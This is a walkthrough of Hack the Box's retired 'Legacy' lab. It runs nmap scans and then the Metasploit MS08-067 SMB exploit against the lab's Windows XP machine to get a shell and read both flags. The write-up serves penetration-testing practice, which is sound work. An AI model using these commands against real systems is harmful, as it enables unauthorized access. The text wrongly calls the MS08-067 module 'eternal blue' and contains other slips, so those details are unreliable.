Hello friends!! Today we are going to solve another CTF challenge “Legacy” which is lab presented by Hack the Box for making online penetration practices according to your experience level. They have collection of vulnerable labs as challenges from beginners to Expert level. HTB have two partitions of lab i.e. Active and retired since we can’t submit write up of any Active lab therefore we have chosen retried Legacy lab.

Level: Beginners

Task: find user.txt and root.txt file in victim’s machine.

Let’s begin the Game!!

Since these labs are online available therefore they have static IP and IP of Legacy is 10.10.10.4 so let’s begin with nmap port enumeration.

nmap -sV 10.10.10.4 –open

From given below image, you can observe that we found open port 139 and 445 denotes that it is windows machine.

When I extract complete result of nmap I found following details

OS: windows XP

Computer name: Legacy

NetBIOS computer name Legacy

As we know in windows XP Port 445 was vulnerable to netapi exploit and it was a remarkable vulnerbality in SMB protcol.

Let confirm SMB vulnerability in victims system using namp script.

nmap --script vuln -p445 10.10.10.4

Awesome!! Victim’s machine is vulnerable to Ms08-67exploit.

Then I run msfconsole command in terminal and load metasploit framework for using eternal blue module for exploiting target machine.

use exploit/windows/smb/ms08_067_netapi

msf exploit(windows/smb/ms08_067_netap) >set rhost 10.10.10.4

msf exploit(windows/smb/ms08_067_netap) >exploit

Awesome!! I have got unauthorized access of victims command shell through session 1 as shown in below image.

Inside c:\Document and Setting \john \Desktop I found user.txt file and used cat “file name” command for reading this file.

cat user.txt

Great!! We got our 1^st flag successfully

Inside c:\Document and Setting \Administrator\Desktop I found root.txt file and used cat “file name” command for reading this file.

cat root.txt

Great!! We got our 2nd flag successfully

Nmap Scan with Timing Parameters

4 ways to Hack MS SQL Login Password

Medusa

Metasploit

Comprehensive Guide to SSH Tunnelling

6 Ways to Hack SNMP Password

SNMP Lab Setup and Penetration Testing

Hack the DerpNStink VM (CTF Challenge)

Compressive Guide to File Transfer (Post Exploitation)

Hack the Vulnupload VM (CTF Challenge)

Hack the W1R3S.inc VM (CTF Challenge)

Hack the Box Challenge: Blocky Walkthrough

Hack the Box Challenge: Lame Walkthrough

Hack the Box Challenge: Blue Walkthrough

Hack the Box Challenge: Grandpa Walkthrough

Hack the Box Challenge: Mirai Walkthrough

Hack the Box Challenge: Appoclyst Walkthrough

Hack the Box Challenge: Solid State Walkthrough

Hack the Box challenge: Sense Walkthrough

Hack the Bob: 1.0.1 VM (CTF Challenge)

Hack the Box Challenge: Beep Walkthrough

Hack the Box Challenge: Legacy Walkthrough